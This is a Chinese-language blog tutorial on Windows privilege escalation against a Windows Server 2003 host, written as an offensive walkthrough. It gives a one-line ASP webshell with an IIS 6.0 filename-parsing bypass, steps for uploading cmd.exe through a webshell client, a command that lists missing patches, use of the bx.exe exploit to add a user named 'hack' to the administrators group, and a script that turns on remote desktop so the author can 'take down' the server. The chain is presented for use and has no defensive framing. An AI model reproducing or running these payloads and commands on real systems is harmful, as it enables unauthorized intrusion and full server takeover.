网络安全之Windows提权(上篇)(高级进阶)

目录

一,什么是提权?

二,提权的前提

三,如何提权?

1,第一步连接服务器

2,提升权限至iuser​编辑

3,利用补丁漏洞提权至最高级

四,总结


一,什么是提权?

提权顾名思义就是提升我们的权限能够让我们去做更多的事,就好比皇帝跟大臣,很多事情只有皇帝能做,大臣做不了例如拟圣旨,掌管虎符,拥有所有人的生杀大权,我们提权的目的就是当皇帝,皇帝做的我们也能做。

二,提权的前提

提权的前提是我们已经拿到了对方服务器的webshell,可以通过文件上传,SQL注入,反序列化等等把一句话木马上传到对方服务器,然后用蚁剑,哥斯拉,冰蝎,菜刀等等工具成功连接。

三,如何提权?

这里用Windows server2003做演示

工具:菜刀

自动开启远程登录脚本:3389.exe

巴西烤肉漏洞利用脚本:bx.exe

一句话木马文件test.asp;.jpg内容:

<%eval request("test")%>

这个文件的命名有2个作用第一绕过上传检测,第二个是利用了iis6.0的文件解析漏洞,在iis6.0中会把test.asp;.jpg当作.asp文件来执行,而且在iis6.0中还会把*.asp文件夹中的所有文件当作.asp文件来执行。

1,第一步连接服务器

连接成功

2,提升权限至iuser

因为我们用菜刀连接服务器的cmd权限只是一个来宾用户没有iuser权限只能进行一些基本的操作,那么怎么办呢?我们可以搭建一个跟对方服务器一样的环境然后把我们具有足够权限的cmd上传到对方服务器上运行就可以了。

通过菜刀上传我们的cmd.exe

使用setp来修改终端路径,格式setp +cmd.exe的绝对路径

setp c:\www.test\XYCMS\cmd.exe

然后发现可以用基本的操作命令了

但是我们发现我们只是network service它的权限与Users组相同

创建用户失败权限不够,因为iuser权限没有这个系统级的权限不能够对它进行系统级的操作

所以我们还得继续提升权限,通过systeminfo查看对方打了那些补丁。

3,利用补丁漏洞提权至最高级

通过以下命令来查看有那些未打补丁的漏洞可以利用

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

这里解读一下命令的作用

1,systeminfo>micropoor.txt:将systeminfo的信息重定向(写入)到micropoor.txt中

2,&:命令连接符,用&连接的多条命令可以一同执行

3,|:管道,可以理解为传输数据的通道

4,(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)

这里的for是循环的意思依次从( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 )中取一个值给%i,@type从micropoor.txt读取内容,@find查找%i是否为

micropoor.txt中的内容找到为真,||逻辑运算符左边为真时右边不执行,左边为假时执行右边,

5,del /f /q /a micropoor.txt:del删除文件命令,/f 强制执行,/q不询问用户,/a文件属性

6,这个命令的整体意思就是把systeminfo的信息写入文件然后与我们给定的编号进行查找如果有就不管,如果没有就输出它的编号,最后删除micropoor.txt文件。

这里我们使用经典的巴西烤肉漏洞

然后利用脚本创建用户

可以看到创建成功了,说明提权成功。

从下面可以看出新建的用户是属于Users组的,在这个组中也只有少量的权限,所以我们把它拉到administrators组中。

使用命令:

bx.exe "net localgroup administrators hack /add"

拉入成功

接下来通过菜刀上传我们的自动开启远程登录脚本,开启对方的远程登录

开启成功

去连接对方

登录成功,成功拿下对方服务器。

四,总结

说一下我的渗透思路吧,首先通过对方服务器的各种漏洞将我们的一句话木马上传至对方的服务器然后通过各种渗透工具连接服务器拿到基本的shell权限,然后将权限提升至基本用户权限,再通过对方补丁漏洞提升至最高权限。

相关推荐
JMchen123几秒前
Android网络安全实战:从HTTPS到双向认证
android·经验分享·网络协议·安全·web安全·https·kotlin
科技块儿2 分钟前
如何选择合适的IP查询工具?精准度与更新频率全面分析
网络·tcp/ip·安全
Hi2024021725 分钟前
在Docker容器中安全运行OpenClaw:无需虚拟机,体验AI助手
人工智能·安全·docker·openclaw
种时光的人25 分钟前
CANN 生态 ×AIGC 合规:cann-compliance 让大模型落地既安全又合规
安全·aigc
hzb6666631 分钟前
unictf2026
开发语言·javascript·安全·web安全·php
大模型玩家七七2 小时前
基于语义切分 vs 基于结构切分的实际差异
java·开发语言·数据库·安全·batch
Binary-Jeff7 小时前
一文读懂 HTTPS 协议及其工作流程
网络协议·web安全·http·https
Hello.Reader9 小时前
Flink ZooKeeper HA 实战原理、必配项、Kerberos、安全与稳定性调优
安全·zookeeper·flink
智驱力人工智能10 小时前
小区高空抛物AI实时预警方案 筑牢社区头顶安全的实践 高空抛物检测 高空抛物监控安装教程 高空抛物误报率优化方案 高空抛物监控案例分享
人工智能·深度学习·opencv·算法·安全·yolo·边缘计算
数据与后端架构提升之路10 小时前
论系统安全架构设计及其应用(基于AI大模型项目)
人工智能·安全·系统安全